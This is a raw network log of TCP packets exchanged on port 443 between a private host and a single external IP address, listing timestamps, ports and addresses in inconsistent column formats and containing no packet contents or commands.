Dec 10, 2024 07:05:27.631892920 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.631915092 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.632071972 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.632092953 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.632143021 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.637976885 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.637995005 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.638135910 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.638155937 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.638254881 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.645227909 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.645246029 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.645325899 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.645339966 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.645401955 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.651209116 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.651226044 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.651349068 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.651365995 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.651423931 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.658194065 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.658212900 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.658325911 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.658346891 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.658391953 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.804649115 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.804697037 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.804846048 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.804864883 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.804946899 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.810617924 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.810638905 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.810758114 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.810771942 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.810827971 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.817487001 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.817502975 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.817662954 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.817681074 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.817739964 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.824362040 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.824383020 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.824516058 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.824529886 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.824587107 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.830331087 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.830348969 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.830491066 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.830508947 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.830594063 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.837949038 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.837971926 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.838051081 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.838068962 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.838140965 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.843592882 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.843610048 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.843696117 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.843705893 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.843750954 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.850517035 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.850541115 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.850604057 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.850613117 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.850684881 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.850684881 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.997107029 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.997134924 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.997231960 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.997252941 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.997308969 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:28.003056049 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:28.003076077 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:28.003139019 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:28.003146887 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:28.003201008 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:28.009856939 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:28.009922981 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:28.009953976 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:28.009962082 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:28.009988070 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:28.010025024 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:28.016772985 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:28.016798019 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:28.016846895 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:28.016855001 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:28.016917944 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:28.016917944 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:28.022783995 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:28.022803068 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:28.022876978 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:28.022891998 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:28.022953987 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.030102968 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.030121088 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.030215979 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.030224085 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.030308962 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.036112070 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.036134005 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.036233902 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.036241055 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.036303043 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.042951107 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.043009996 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.043040037 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.043051004 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.043097973 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.043119907 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.189097881 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.189146996 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.189184904 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.189199924 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.189256907 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.195965052 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.195983887 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.196043968 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.196052074 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.196094036 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.196154118 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.202006102 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.202023983 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.202116966 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.202130079 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.202184916 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.209095955 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.209119081 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.209187031 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.209194899 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.209249973 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.215691090 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.215713024 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.215771914 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.215790033 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.215816021 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.215846062 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.222091913 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.222110033 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.222208977 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.222217083 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.222250938 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.222275019 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.229234934 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.229278088 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.229310989 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.229319096 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.229351044 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.229383945 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.235089064 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.235110998 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.235169888 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.235177994 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.235234976 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.381324053 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.381350040 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.381488085 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.381515980 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.381591082 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.388148069 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.388165951 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.388230085 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.388246059 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.388277054 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.388298988 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.394156933 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.394176960 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.394278049 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.394289017 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.394365072 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.401073933 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.401098013 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.401247025 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.401257992 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.401313066 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.408194065 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.408211946 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.408271074 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.408277988 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.408323050 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.408384085 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.414243937 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.414262056 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.414335012 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.414343119 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.414400101 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.421160936 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.421178102 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.421252966 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.421263933 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.421308994 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:28.427185059 CET4434970741.185.8.252192.168.2.9
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Dec 10, 2024 07:05:28.427206993 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.427304029 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.427316904 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.427372932 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.573450089 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.573476076 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.573546886 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.573565006 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.573586941 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.573611975 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.580219030 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.580315113 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.580374002 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.580383062 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.580411911 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.580442905 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.587008953 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.587080002 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.587116957 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.587150097 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.587166071 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.589167118 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.593034029 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.593055964 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.593195915 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.593234062 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.593338966 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.599971056 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.599991083 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.600128889 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.600151062 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.600219965 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.606384993 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.606405973 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.606503010 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.606515884 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.606549978 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.606561899 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.613229036 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.613249063 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.613360882 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.613374949 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.613428116 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.620096922 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.620156050 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.620198965 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.620213032 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.620285988 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.766371965 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.766402960 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.766495943 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.766518116 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.766544104 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.766561985 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.772639036 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.772664070 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.772804976 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.772819042 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.772870064 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.780627012 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.780646086 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.780736923 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.780755997 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.780798912 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.785768986 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.785788059 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.785911083 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.785923004 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.786025047 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.793548107 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.793576002 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.793709040 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.793721914 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.793812990 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.799041033 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.799057007 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.799212933 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.799230099 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.799297094 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.805706978 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.805727005 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.805828094 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.805849075 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.805896997 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.811788082 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.811806917 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.811933994 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.811954021 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.812007904 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.958349943 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.958378077 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.958431005 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.958445072 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.958486080 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.958523989 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.964458942 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.964479923 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.964559078 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.964569092 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.964591026 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.964617014 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.971247911 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.971267939 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.971365929 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.971379042 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.971442938 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.971489906 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.978101015 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.978125095 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.978266001 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.978291988 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.978343964 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.984932899 CET  443          49707      41.185.8.252  192.168.2.9
